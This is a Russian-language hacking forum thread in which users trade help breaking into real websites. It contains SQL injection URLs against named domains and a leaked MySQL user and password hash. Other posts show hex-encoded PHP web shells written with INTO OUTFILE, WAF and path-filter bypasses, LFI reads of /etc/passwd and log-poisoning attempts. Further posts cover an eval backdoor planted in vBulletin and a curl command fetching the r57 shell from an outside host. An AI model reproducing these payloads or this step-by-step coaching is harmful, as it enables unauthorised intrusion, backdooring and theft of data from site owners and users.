Expl0ited said:
линку в личку


Скинул

Существуют варианты обойти фильтрацию WHERE в запросе? Фильтруется, походу, тупым поиском текста в запросе. Тоесть /*!%0DWhErE*/ и подобные вариации не помогают.

alexvrn said:
Можно залить ли шелл в fckeditor 2.6.6 только .htaccess уже есть в папках? magic_quotes_gpc Off


если к примеру нжинкс стоит криво настроеный, то да.

m00c0w said:
если к примеру нжинкс стоит криво настроеный, то да.


«нжинкс» не работает с .htaccess в принципе..

Ruslan1817 said:
http://gir[убрать]rsa.ru/search/',Stick,
подскажите.


Невозможно найти удалённый сервер

Есть ли вариант обойти ORA-06502 ? character to number conversion error

Реагирует так на кавычку или комментарий (--,--+ и т.д.).Часто встречал в движке такое.

Реакция даже на пробелы( хз уже,что подставлять ).

Breetonia said:
Есть ли вариант обойти ORA-06502 ? character to number conversion error
Реагирует так на кавычку или комментарий (--,--+ и т.д.).Часто встречал в движке такое.
Реакция даже на пробелы( хз уже,что подставлять ).


пробуй варианты ссылко (https://rdot.org/forum/showthread.php?t=156)

Вопрос такой:

Кручу, кручу скулю, получаю БД.

В основном все с приставкой ipb. Ну следовательно форум ipb, ищу пароль админа... не нахожу)

там где-то сотня таблиц и найти не могу(

подскажите ее название пожалуйста)

Ruslan1817 said:
исправил.
gir[убрать]sa.ru/search/',Stick,
кто поможет?


Увы, тип скули - стринг. Тоесть с кавычкой. А кавычки там слэшируются.

Вообще интерестная скуль.

http://girsa.ru/search/'1+order+by+100+--+


Query failed: select gid from tags where tag = '\' or tag='\'1' or tag='order' or tag='by' or tag='100' or tag='--' ; (1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1' or tag='order' or tag='by' or tag='100' or tag='--'' at line 1)



http://girsa.ru/search/'%0D1%0Dorder%0Dby%0D100%0D--%0D


Query failed: select gid from tags where tag = '\' or tag='\' 1 order by 100 -- ' ; (1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' 1 order by 100 -- '' at line 1)

Ruslan1817 said:
исправил.
gir[убрать]sa.ru/search/',Stick,
кто поможет?


Осмелюсь предположить что ничего не выйдет, как я понял в скрипте не фильтруется только первый символ запроса, остальные фильтруются(?), т.е.:

http://girsa.ru/search/'

Получаем запрос: select gid from tags where tag = '\' or tag='\''

где красным выделено, то что нарушает синтаксис запроса, обойти это увы у меня не вышло.

Expl0ited said:
линку в личку


Expl0ited, можно как-то шелл залить на тот сайт?

Подскажите как залить шелл, пробую так


http://k5.ru/m/all.php?id=12+limit+0,0+union+select+1,0x20273c3f7 06870206576616c286261736536345f6465636f646528245f5 24551554553545b636d645d29293b203f3e2720696e746f206 f757466696c6520272f7573722f6c6f63616c2f61706163686 5322f6874646f63732f6d2f7368656c6c2e706870272d2d,3--+


и не выходит, я может чтото делаю неправильно?

qaz said:
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?


Наверное, поэтому

http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)fr om(select(@x:=0x00),(select(0)from(mysql.user)wher e(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User, 0x3a,Password,0x3a,File_priv))))x),3+from+mysql.us er+--+

localhost:forks::Y

77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10 EFC0CBD5FD:Y

qaz said:
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?


Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.

er9j6@ said:
Наверное, поэтому
http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)fr om(select(@x:=0x00),(select(0)from(mysql.user)wher e(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User, 0x3a,Password,0x3a,File_priv))))x),3+from+mysql.us er+--+
localhost:forks::Y
77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10 EFC0CBD5FD:Y


а я не шарю что ето значит, подскажи

qaz said:
а я не шарю что ето значит, подскажи


ну, это значит что подключение к бд разрешено с определенных хостов

R0nin said:
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в
/var/lib/mysql/
, а www сервер уж точно не будет запускать скрипти оттуда.


он будет иметь право для запеси в папки с правами 777, т.е где разрешены запеси для всех групп.

Приветствую.

Сканил Acunetix'ом один ресурс и он выдал мне следующее:


Acunetix detected this (ASP.NET Padding Oracle Vulnerability) vulnerability by comparing the HTTP response status and body for two different requests (one request when the padding is incorrect and another one where the encrypted text is not valid). If the body AND/OR status are different, this vulnerability can be exploited.
First request: Status code 404 Response body (first 500 bytes) ################ #### ############## (404) QRATOR HTTP 503 - application is too busy right now. ...


И приводит запрос, который выдает 404 и 503 ошибку. Я пытался его воспроизвести, но у меня получилась только 404 ошибка.


GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=jqvbmouzqvyyng4534ofwa55
Host: ***.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*


503-ю воспроизвести не могу. И интересует такой вопрос: насколько реально будет эксплуатировать данную уязвимость? Если вообще реально. Спасибо.

qaz said:
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?


1. там mq=on. Это делает невозможным заливку, потому что железно нужны кавычки.

2. нельзя переводить в хекс методы, операторы и т.п.

Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.


реально бред


ну, это значит что подключение к бд разрешено с определенных хостов


это тоже значение не имеет, к бд обращается сам скрипт, уж у него права на подключение есть

Melfis верно сказал Двойного запроса там тоже не видно, нужно другой способ искать, благо читалка там есть

trololoman96 said:
реально бред


Сейчас, специаьлно для тебя запустил apache & mysql, и специально написал php скрипт, через которй вводил комманды sql, при попытке создать файл в www выдает ошибку:


Code:
Can't create/write to file '/var/www/hello.txt' (Errcode: 13)

И где бред??


winstrool said:
он будет иметь право для запеси в папки с правами 777, т.е где разрешены запеси для всех групп.


Это естественно.

R0nin said:
Сейчас, специаьлно для тебя запустил apache & mysql, и специально написал php скрипт, через которй вводил комманды sql, при попытке создать файл в www выдает ошибку:

Code:
Can't create/write to file '/var/www/hello.txt' (Errcode: 13)

И где бред??
Это естественно.


Бред в том, что ты делаешь неправильный вывод. Права на каждом сервере могут быть разные и это основное. Ты кстати только что себе противоречишь.

Melfis said:
Бред в том, что ты делаешь неправильный вывод. Права на каждом сервере могут быть разные и это основное. Ты кстати только что себе противоречишь.


Где я написал, что все серверы имеют одинаково настроенные права? Говорю, что если сервер нормально настроенный то у него не будут права записать файл, если на сервере нету директории с 777, в чем я сильно сомневаюсь.

а вот такой вопрос, хотел залить шелл,

а мне пишет


#1 - Can't create/write to file '/data/www/docs/site/images/sh.php' (Errcode: 2)


чё ет значит? типа нету прав на папке 777??

qaz said:
чё ет значит? типа нету прав на папке 777??


Да, ты прав.

qaz said:
а вот такой вопрос, хотел залить шелл,
а мне пишет
чё ет значит? типа нету прав на папке 777??


error code 2 = неправильный файл / директория

нехватка прав это error code 13

Konqi said:
error code
2
= неправильный файл / директория
нехватка прав это error code
13


блин, а что я таогда могу делать неправильно??

захожу через phpmyadmin под root, все права, все БД

нашол среди сайтов на серваке сайт где в ошибке есть полный путь

выполняю запрос


select '' from mysql.user into outfile '/data/www/docs/site/sh.php'


и выскакивает ета ошибка, где я мог ошибится?

qaz said:
блин, а что я таогда могу делать неправильно??
захожу через phpmyadmin под root, все права, все БД
нашол среди сайтов на серваке сайт где в ошибке есть полный путь
выполняю запрос
и выскакивает ета ошибка, где я мог ошибится?


ты уверен что бд и сайт на одном серваке?

...

Konqi said:
ты уверен что бд и сайт на одном серваке?
...


мм.. точно, не на одном, блин, как тогда узнать полный путь?

я кроче попытался загрузить

etc/passwd

мне выдало такое

at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bi...

я так понимаю там должно быть продолжение?, потом мне посоветовали посмотреть через конфинг апача

/etc/apache2/httpd.conf

выдал такое

230a23202f6574632f617061636865322f68747470642e636f 6e66200a230a23205468697320697320746865206d61696e20 2e2e2e

можно ли както от етого добится инфы о полном пути?

Сайт в личку кидай.

qaz said:
мм.. точно, не на одном, блин, как тогда узнать полный путь?
я кроче попытался загрузить
etc/passwd
мне выдало такое
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bi...
я так понимаю там должно быть продолжение?, потом мне посоветовали посмотреть через конфинг апача
/etc/apache2/httpd.conf
выдал такое
230a23202f6574632f617061636865322f68747470642e636f 6e66200a230a23205468697320697320746865206d61696e20 2e2e2e
можно ли както от етого добится инфы о полном пути?



может быть получится узнать полный путь, но полный путь до чего? может это отдельный серв для базы, и там нету http сервера, может там нету интерпретатора php, или сайтов нету.. зачем тебе голый серв? посмотри к какому хосту подключен твой юзер mysql, и поищи сайты на этом ip (bing.com)

Konqi said:
может быть получится узнать полный путь, но полный путь до чего?


Полгый путь к файлам для заливки шелла, так как етим можно вопользоватся?


Ereee said:
Сайт в личку кидай.


кинул

qaz said:
Полгый путь к файлам для заливки шелла, так как етим можно вопользоватся?
кинул


qaz, рекомендую читать книги по web, чтобы представить как работают службы, протоколы и прочее.

я же обяснил, если там не будет http servera то "путь к файлам" который вы имеете ввиду папки под веб (Public docs) такого существовать не будет. то есть через браузер открыть залитый шелл невозможно будет

Konqi said:
qaz
, рекомендую читать книги по web, чтобы представить как работают службы, протоколы и прочее.
я же обяснил, если там не будет http servera то "путь к файлам" который вы имеете ввиду папки под веб (Public docs) такого существовать не будет. то есть через браузер открыть залитый шелл невозможно будет


я согласен, подскажите с чего лутше начать изучать ети службы и тп. так как особого поняти не имею как даже их в гугле обозвать

qaz said:
я согласен, подскажите с чего лутше начать изучать ети службы и тп. так как особого поняти не имею как даже их в гугле обозвать


да хоть с этой книги


Книга: Web-протоколы. Теория и практика
Автор: Б. Кришнамурти, Дж. Рексфорд


и еще не повредит тебе книга от фленова "Linux Глазами хакера", наверное его самая нормальная работа

+ найди сам книжку по LAMP на любителя

есть фильтр от инклуда такой


PHP:
...

preg_replace('/\.+\//','',$include);

...



на виндовсе все понятно там слешы в другую сторону, можно как то на линксе выйти из за пределы папки чтобы провести инклуд ?

trololoman96 said:
есть фильтр от инклуда такой

PHP:
...

preg_replace('/\.+\//','',$include);

...



на виндовсе все понятно там слешы в другую сторону, можно как то на линксе выйти из за пределы папки чтобы провести инклуд ?


нет.

Есть инъекция на сайте, file_priv = Y, mg = off. Нашел папку с правами на запись.

Вот так:


http://site.ru/s.php?pid=25171-11111.1'))+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13+from+mysql.user+into+outfile+'/tmp/test.php'--+


Вот так работает, а вот так нет


http://site.ru/s.php?pid=25171-11111.1'))+union+select+1,'',3,4,5,6,7,8,9,10,11,1 2,13+from+mysql.user+into+outfile+'/tmp/test.php'--+


В чем может быть проблема ?

trololoman96

Хм, если код такого вида

$include = preg_replace('/\.+\//', '', $include);

include($include);

то ничего не сделать, но ты запостил preg_replace('/\.+\//', '', $include);

если код такого вида

preg_replace('/\.+\//', '', $include);

include($include);

то фильтрация работать не будет, точнее функция работать, но переменную не меняет, возвращает отфильтрованный результат, с которым по идее надо работать.

bodrich said:
Есть инъекция на сайте, file_priv = Y, mg = off. Нашел папку с правами на запись.
Вот так:
Вот так работает, а вот так нет
В чем может быть проблема ?


Проблема может быть в одинарных кавычках.



Переведите в hex.

/tmp надеюсь не та папка с правами на запись, которую вы нашли. Сервер вам не позволит оттуда запускать скрипты.

bodrich

Запись вообще в файл происходит? Что записывается? Возможно фильтр стоит на какие нибудь символы "<>$[]"

bodrich said:
Есть инъекция на сайте, file_priv = Y, mg = off. Нашел папку с правами на запись.
Вот так:
Вот так работает, а вот так нет
В чем может быть проблема ?


свой бек надо в хекс засунуть, т.е место


http://site.ru/s.php?pid=25171-11111.1'))+union+select+1,'',3,4,5,6,7,8,9,10,11,1 2,13+from+mysql.user+into+o utfile+'/tmp/test.php'--+


сделай так:


http://site.ru/s.php?pid=25171-11111.1'))+union+select+1,0x3c3f706870206576616c28 245f524551554553545b636d645d293b203f3e,3,4,5,6,7,8 ,9,10,11,12,13+from+mysql.user+into+o utfile+'/tmp/test.php'--+

Символ ; в GET-запросе является разделителем параметров аналогично символу &.

Не '', а ''

M_script said:
Символ
;
в GET-запросе является разделителем параметров аналогично символу
&
.
Не '', а ''


Осмелюсь не согласится, в адресной строке разделитель только и только амперсанд (&)

Expl0ited said:
Осмелюсь не согласится, в адресной строке разделитель только и только амперсанд (&)


Согласен. Он наверно имел ввиду SMF.

Expl0ited, пруф - http://en.wikipedia.org/wiki/URI_scheme

The query is an optional part, separated by a question mark ("?"), that contains additional identification information that is not hierarchical in nature. The query string syntax is not generically defined, but it is commonly organized as a sequence of = pairs, with the pairs separated by a semicolon or an ampersand. For example:

Semicolon: key1=value1;key2=value2;key3=value3

Ampersand: key1=value1&key2=value2&key3=value3​

http://tools.ietf.org/html/rfc1866


HTTP server implementors, and in particular, CGI implementors are encouraged to support the use of `;' in place of `&' to save users the trouble of escaping `&' characters this way.

http://forum.antichat.net/view_reputation.php?userid=1845&p=3046274&count=5000

http://forum.antichat.net/view_reputation.php?userid=1845&p=3046274;count=5000

Ereee, никто не говорил, что на всех серверах.

M_script, можно живой пример Веб-сервера в котором действительно http распознает в адресной строке символ ; за разделитель?

Насколько мне известно apache, nginx, iis, zeus, lighthttpd распознают & как разделитель и ; как обычный символ.

http://auto.mail.ru/article.html?id=111

http://auto.mail.ru/article.html?a=b&id=111

http://auto.mail.ru/article.html?a=b;id=111

Этого хватит? )

M_script said:
http://auto.mail.ru/article.html?id=111
http://auto.mail.ru/article.html?a=b&id=111
http://auto.mail.ru/article.html?a=b;id=111
Этого хватит? )


Хорошо Но всё же стоит отметить что символ ; как разделитель это прерогатива других протоколов (например таких как data), отличных от http(s), в http(s) это индивидуальная (не стандартная) настройка, и случаи такие единичные.

M_script said:
http://auto.mail.ru/article.html?id=111
http://auto.mail.ru/article.html?a=b&id=111
http://auto.mail.ru/article.html?a=b;id=111
Этого хватит? )


Кстати НЕТ, пожалуй не соглашусь, потому как в данном случае скорее всего используется mod_rewrite в котором собственная система парсинга получаемых данных.

Это не стандарт HTTP-протокола, а рекомендация W3C, связанная со стандартом HTML, чтобы избавиться от 4-х лишних символов при написании пути (&amp;)

Ты просто не обращал внимания, на крупных серверах встречается часто.


Expl0ited said:
в данном случае скорее всего используется mod_rewrite в котором собственная система парсинга получаемых данных


Разницы нет, как реализовано. Если в RFC HTML прописана настоятельная рекомендация поддерживать разделитель ;, почему ты думаешь, что никто не будет выполнять эту рекомендацию?

yandex.ru

rambler.ru

msn.com

yahoo.com

trololoman96 said:
есть фильтр от инклуда такой

PHP:
...

preg_replace('/\.+\//','',$include);

...



на виндовсе все понятно там слешы в другую сторону, можно как то на линксе выйти из за пределы папки чтобы провести инклуд ?




R0nin said:
нет.



Извините, что лезу в ваш разговор, но хотел бы прокорректировать свой ответ. Один юзер скинул ссылку, где чел с другого форума пишет, что этот фильтр возможно обойти: https://rdot.org/forum/showpost.php?p=24148&postcount=1930

Поэтому хочу детально ответить на этот вопрос, чтобы быть 100% уверенным в своем ответе проверил на практике:

Скажем код у нас такой


PHP:


Чел с другого форума утверждает, что можно обойти если задать ..\/..\/..\/etc/hosts я говорю что нельзя. Такое прокатит только у веб сервера, но не у скрипта.

Задаем


Code:
www.site.ru/a/b/c/..\/..\/file.php

тут можно выйти за пределы папки (a, b, c) потому что так решает веб сервер, а не скрипт.

Но если задать


Code:
www.site.ru/test/page.php?include=..\/..\/..\/etc/hosts

содержание аргумента паредается как есть, т.е. ..\/..\/..\/etc/hosts, а функция типа include() не станет открывать такой адрес.

А сейчас внимание!

Если задать абсолютный путь к файлу этот фильтр можно обойти, т.е.


Code:
www.site.ru/test/page.php?include=/etc/hosts

открывает файл.

У меня веб сервер на локалхосте (LAMP), стоит с настроиками по умолчанию.

Ответ c411k'а правильный, его способ работает как на виндовсе так и на линуксе без проблем Я пробывал его вначале, но сбросил со счетов ибо проверял в консольке типа того


Code:
cd ..\/..\/..\/..\/..\/..\/..\/..\/

и нифага оно не переходило в низ по каталогам, потом уже попробывал так


Code:
cat ..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd

и файл прочитался И инклуд работает, смотри:


PHP:




.htaccess лежит в корне диска и прекрасно инклудится.

trololoman96 said:
Ответ
c411k
'а правильный, его способ работает как на виндовсе так и на линуксе без проблем
Я пробывал его вначале, но сбросил со счетов ибо проверял в консольке типа того

Code:
cd ..\/..\/..\/..\/..\/..\/..\/..\/

и нифага оно не переходило в низ по каталогам, потом уже попробывал так

Code:
cat ..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd

и файл прочитался
И инклуд работает, смотри:

PHP:




.htaccess лежит в корне диска и прекрасно инклудится.


Насчет cat ты прав, действительно работает (что-то новое для меня). include() не работает.

подскажите как обойти фильтр на from, в sql запросе??

/*!from*/ - не пускает

FroM - не пускает

тоисть version() , database(), user() это все работает,

строю запрос типа table_name+from пишет: запрос небезопасен и был отвергнут

pirat0 said:
подскажите как обойти фильтр на from, в sql запросе??
/*!from*/ - не пускает
FroM - не пускает
тоисть version() , database(), user() это все работает,
строю запрос типа table_name+from пишет: запрос небезопасен и был отвергнут


/showpost.php?p=2303206&postcount=14694

M_script said:
Символ
;
в GET-запросе является разделителем параметров аналогично символу
&
.
Не '', а ''


а зачем вообще ставить ; в этом коде? если такие создаются проблемы из за ;

ЗЫ на моем опыте я еще ни разу не сталкивался с проблемой c ;

ЗЫЫ М_скрипт возможно ты в чем то прав, но все же больше склоность к тому что это срабатывает из за mod_rewrite , так как на сколько я знаю разделители это ?(первый параметр) и &, а все остальное .... это уже извращениие.

Кто 100% уверен, ответьте пожалуйста на предыдущий спорный вопрос, насчет путей к файлу. У trololoman96 открывается, у меня нет. У него версия PHP по старше, у меня 5.3.10. Интересно, include должен открывать такие пути или нет?

R0nin said:
Кто 100% уверен, ответьте пожалуйста на предыдущий спорный вопрос, насчет путей к файлу. У
trololoman96
открывается, у меня нет. У него версия PHP по старше, у меня 5.3.10. Интересно, include должен открывать такие пути или нет?


Потестил у себя , базовый набор денвера PHP: Version 5.3.3, ОС: Windows

Файилы инклудится с корня...

winstrool said:
Потестил у себя , базовый набор денвера PHP: Version 5.3.3, ОС: Windows
Файилы инклудится с корня...


Грузится

http://localhost/a/inc.php?inc=../index.php​

не грузится.

http://localhost/a/inc.php?inc=..\/index.php​

Перепробовал все варианты, все равно не грузится гад.

Простите за упорство, но решение вопроса должен был довести до конца.

Перепробовал на трех разных OS, версия PHP отличаются:

Debian & Ubuntu:

Работает

http://localhost/a/inc.php?inc=../index.php​Не работает!

http://localhost/a/inc.php?inc=..\/index.php​

Windows XP:

Работает

http://localhost/a/inc.php?inc=../index.php​Работает

http://localhost/a/inc.php?inc=..\index.php​Работает!

http://localhost/a/inc.php?inc= ..\/index.php​Работает!

http://localhost/a/inc.php?inc=../\index.php - через этот фильтр не пройдет, но таким способом тоже можно задать путь к файлу​

Вывод:

На Windows такая комбинация работает, потому что путь к файлу можно задавать как через \ так и через / (на Linux только /). Поэтому если в Windows задать \/ или /\ то это аналогично линуксовскому //.

Получается мой изначальный ответ был правильным - на Linux не работает. Если я где-то допустил ошибку сообщите.

Помогите раскрутить fckeditor version 2.6.6 Build 25427

Могу заливаьт картинки. больше ничего и файлы (точно знаю, что .txt)

2-а вопроса:

1. Как удалять файлы? (думаю, есть какой то параметр в ( Command=GetFoldersAndFiles )


PHP:
http://******.ru/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

Заливка возможна через:


PHP:
http://******.ru/fckeditor/editor/filemanager/connectors/uploadtest.html



PHP:
http://******.ru/fckeditor/editor/filemanager/connectors/test.html

2. Как туда ливануть шел. includ`а нет, либо не нашел.

Card3 said:
Помогите раскрутить fckeditor version 2.6.6 Build 25427
Могу заливаьт картинки. больше ничего и файлы (точно знаю, что .txt)
2-а вопроса:
1. Как удалять файлы? (думаю, есть какой то параметр в ( Command=GetFoldersAndFiles )

PHP:
http://******.ru/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

Заливка возможна через:

PHP:
http://******.ru/fckeditor/editor/filemanager/connectors/uploadtest.html


PHP:
http://******.ru/fckeditor/editor/filemanager/connectors/test.html

2. Как туда ливануть шел. includ`а нет, либо не нашел.


там пофиксена бага с заливкой шелла..не зальешь

Хорошо. А как удалить папки и файлы? (.txt)

Card3 said:
Хорошо. А как удалить папки и файлы? (.txt)


админ удалит когда спалит

LFI, проблема инклуда пхп кода в логи

Помогите понять некоторые проблемы, с которыми я столкнулся при раскрутке LFI уязвимости. Нашол логи:

http://www.domain.com/index.php?option=com_jresearch&controller=../../../../../../../../../../../../../homepages/26/d13583872/htdocs/logs/access.log.current%00

пробую проинклудить с помощью юзер агента код вида

- херит логи и выдает ошибку что то типа связаную с кавычками, пробую вот так

в куки заганяю - cmd=phpinfo();

та же ерунда...

помогите разобраться с уязвимостью.

access.log испорчен, ищи другой способ.

Expl0ited said:
access.log испорчен, ищи другой способ.


а как инклудить чтоб неиспортить логи?

p.s. способ с /proc/self/environ%00 не катит, есть еще какие способы, а то уже готов бросить поиски?

/thread232773.html

Expl0ited said:
/thread232773.html


эту ветку всю перечитал, но вот так и не нашол ответа на вопрос, как инклудить в лог access чтоб его не испортить

Zahar, попробуй такое


PHP:




__halt_compiler() остановит выполнение скрипта, компилятор так и не увидит синтаксических ошибок в коде (если их конечно не будет выше) и выполнит твой код выше.

trololoman96 said:
Zahar, попробуй такое

PHP:




__halt_compiler() остановит выполнение скрипта, компилятор так и не увидит синтаксических ошибок в коде (если их конечно не будет выше) и выполнит твой код выше.


Логи пишутся в конец файла, по этому сначала отработает испорченный код, а потом вывалиться ошибка.

Expl0ited said:
Логи пишутся в конец файла, по этому сначала отработает испорченный код, а потом вывалиться ошибка.


да логи пишуться в конец файла, это 100%.

на испорченом логе произойдет та же ошибка, но дело в том что я столкнулся с таким не на одном сайте а на множестве, надо попробовать выше описаный код. отпишу сдесь обязательно.

Собственно вопрос, получил доступ к одному сайту (задача добратся к соседу), слил базу нашел логин и пароль админа удачно авторизировался на соседнем сайте, как залить shell на соседний сайт (для загрузки файлов там используется ckeditor), если везде установлен open_basedir, для доступа к файлам соседа использовал PHP 5.2.9 safe_mode & open_basedir bypass, но надоело по 1 файлу копировать, как можно заупаковать все сайты на сервере и скачать одним архивом? (пробывал различные шеллы в том числе и wso, не один не обошел open_basedir.

http://picru.net/thumbs/20fqh.jpg (http://picru.net/?v=20fqh.jpg)

и почему там отображает директории(что за символы) open_basedir bypass?

Server OS : FreeBSD 8.2-RELEASE #0: Fri Feb 18 02:24:46 UTC 2011

Server software : Apache/2.0.63 (Unix) PHP/5.2.8 cURL MySQL/4.1.25

User info : uid=2525(apache) gid=2523(apache)

SafeMode : OFF

OpenBaseDir : /usr/local/psa/home/vhosts/domain.ru/httpdocs:/tmp

Disable functions : NONE

trololoman96 said:
Zahar, попробуй такое

PHP:




__halt_compiler() остановит выполнение скрипта, компилятор так и не увидит синтаксических ошибок в коде (если их конечно не будет выше) и выполнит твой код выше.


попробовал даным способом и столкнулся еще с одной проблемой, при вписывании в юзерагент кода пхп сервер попросту не отвечает, нашол еще еррор лог апача но увы


HTML:
Fatal error: Out of memory (allocated 56360960) (tried to allocate 47972352 bytes) in

Попробовал просто гетом отправить вот так


HTML:
http://www.domain.com/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../etc/passwd%00

посмотрел access log но запрос попросту принял вид


HTML:
%3C?php%20phpinfo();%20?%3E

для эксплуатации непригоден.

Камрады есть еще варианты, потому как у меня попросту уже исчерпался запас.

подскажите с заливкой шелла в vbulletin

в фак копмлит добавил php переменную

пробывал разные методы

мэджик квотес врублены(мб в этом трабла)

подскажите плз

да

(5 симв)

Cherep said:
подскажите с заливкой шелла в vbulletin
в фак копмлит добавил php переменную
пробывал разные методы
мэджик квотес врублены(мб в этом трабла)
подскажите плз



какую переменную ты добавил, как выглядит вообще твой код?

минишелл добавил, попробывал загрузить файл, ошибок никаких не выдало, но при переходе на адрес шела-редиректит на главную страничку форума


HAXTA4OK said:
какую переменную ты добавил, как выглядит вообще твой код?


eval($_GET[e]);

Cherep said:
минишелл добавил, попробывал загрузить файл, ошибок никаких не выдало, но при переходе на адрес шела-редиректит на главную страничку форума
eval($_GET[e]);


набудующее от кавычек stripslashes ,eval(stripslashes($_GET[e]))

а в твое случае попробуй имятвоего_скрипта.php?e=eval(strip slashes($_GET[a]))&a=ну и тут твой код с кавычками

Zahar said:
посмотрел access log но запрос попросту принял вид

HTML:
%3C?php%20phpinfo();%20?%3E

для эксплуатации непригоден.
Камрады есть еще варианты, потому как у меня попросту уже исчерпался запас.


Перекодирует браузер, нужно использовать тулзу, которая отправляет сырой запрос,

в простейшем случае - telnet, много инструментов более удобных. Не трудно отправить курлом.

На форуме была программа (https://antichat.live/threads/121239/).

HAXTA4OK said:
набудующее от кавычек stripslashes ,eval(stripslashes($_GET[e]))
а в твое случае попробуй имятвоего_скрипта.php?e=eval(strip slashes($_GET[a]))&a=ну и тут твой код с кавычками


собственно записал в фак комплит

eval(stripslashes($_GET[e]));

но чето всёравно не получается(

вот какой код использую


Code:
e=system('curl http://www.sh3ll.org/r57.txt > 23.php');

Cherep said:
собственно записал в фак комплит
eval(stripslashes($_GET[e]))
но чето всёравно не получается(
вот какой код использую

Code:
e=system('curl http://www.sh3ll.org/r57.txt > 23.php');




напиши в пм домен....уверен что папка на запись досутпна?

Пару вопросов,

сижу в phpmyadmin с правами рут

где в настройках изменить max_allowed_packet

и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя

bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\

каким будет полный путь к файлам исходя из етого?

qaz said:
Пару вопросов,
сижу в phpmyadmin с правами рут
где в настройках изменить max_allowed_packet
и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя
bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\
каким будет полный путь к файлам исходя из етого?


"max_allowed_packet" менять надо в my.ini

второй вопрос не правильно составил, что это за юзер? и что означает полный путь к файлам? и к каким файлам?

Konqi said:
"max_allowed_packet" менять надо в
my.ini
второй вопрос не правильно составил, что это за юзер? и что означает полный путь к файлам? и к каким файлам?


полный путь к файлам на хостинге, чтобы шелл залить

qaz said:
Пару вопросов,
сижу в phpmyadmin с правами рут
где в настройках изменить max_allowed_packet
и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя
bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\
каким будет полный путь к файлам исходя из етого?



если я тебя правильно понял то ищи конфиг http.conf там тебе и будет путь

HAXTA4OK said:
если я тебя правильно понял то ищи конфиг http.conf там тебе и будет путь


чёт не могу конфинг откопать

всё что перепробовал


/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/apache2.conf


как ещо бывает?

qaz said:
чёт не могу конфинг откопать
всё что перепробовал
как ещо бывает?


ты уверен что там apache вообще? смотри какая система стоит (@@version_compile_os, или по баннерам сервера)

дальше ищи в гугле, где в данной системе конфиги хранятся

Konqi said:
ты уверен что там apache вообще? смотри какая система стоит (@@version_compile_os, или по баннерам сервера)
дальше ищи в гугле, где в данной системе конфиги хранятся


проверил, система линукс

нашол под неё конфиги

http://microsin.ru/content/view/542/1/

подобного http.conf я ненашол, или я плохо искал?

qaz said:
проверил, система линукс
нашол под неё конфиги
http://microsin.ru/content/view/542/1/
подобного http.conf я ненашол, или я плохо искал?



qaz, в разных дистрибутивах конфиги хранятся в разных каталогах. на эту тему можно флудить на 100 страниц, читайте и практикуйтесь.

/thread49775.html

http://wiki.apache.org/httpd/DistrosDefaultLayout

ищи логи в них тоже могут быть пути....какая верси пхпмуадмина? может там есть баги на раскрытие путей

Доброй ночи, ачат. Есть одна скуля. Есть полный доступ к структуре БД information_schema уязвимого ресурса. Как узнать аналог file_priv если мы говорим об information_schema?

Погуглив, увидел приблизительный ответ на свой вопрос.

select grantee from information_schema.user_privileges where privilege_type='FILE' and is_grantable='YES'

Но что делать, если в таблице user_privileges вообще нет поля 'FILE'? Каким еще тестовым запросом можно определить свои права для работы с файлами? Означает ли отсутствие 'FILE' как отсутствие каких-либо прав с работой над файлами вообще?

Сильно не смейтесь, это не мой профиль, просто попросили помочь :3

select file_priv from mysql.user

или что тебе конкретно нужно, ты опиши

ты хочешь узнать права юзвера мускула? тогда запрос я тебе написал, или что тебе нужно?

Спасибо за ответ.


HAXTA4OK said:
select file_priv from mysql.user


БД "mysql" отсутствует вообще. Есть только information_schema. Да, мне нужно узнать, существует ли возможность узнать аналог select file_priv from mysql.user для information_schema.

Как-то так, в общем.

лично я не знаю, я так понимаю ты хочешь через скулю залить шелл да?

Га-Ноцри said:
Спасибо за ответ.
БД "mysql" отсутствует вообще. Есть только information_schema. Да, мне нужно узнать, существует ли возможность узнать аналог select file_priv from mysql.user для information_schema.
Как-то так, в общем.



если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов.

в information_schema не хранится информация о правах, так что не ищи дальше.

HAXTA4OK said:
лично я не знаю, я так понимаю ты хочешь через скулю залить шелл да?


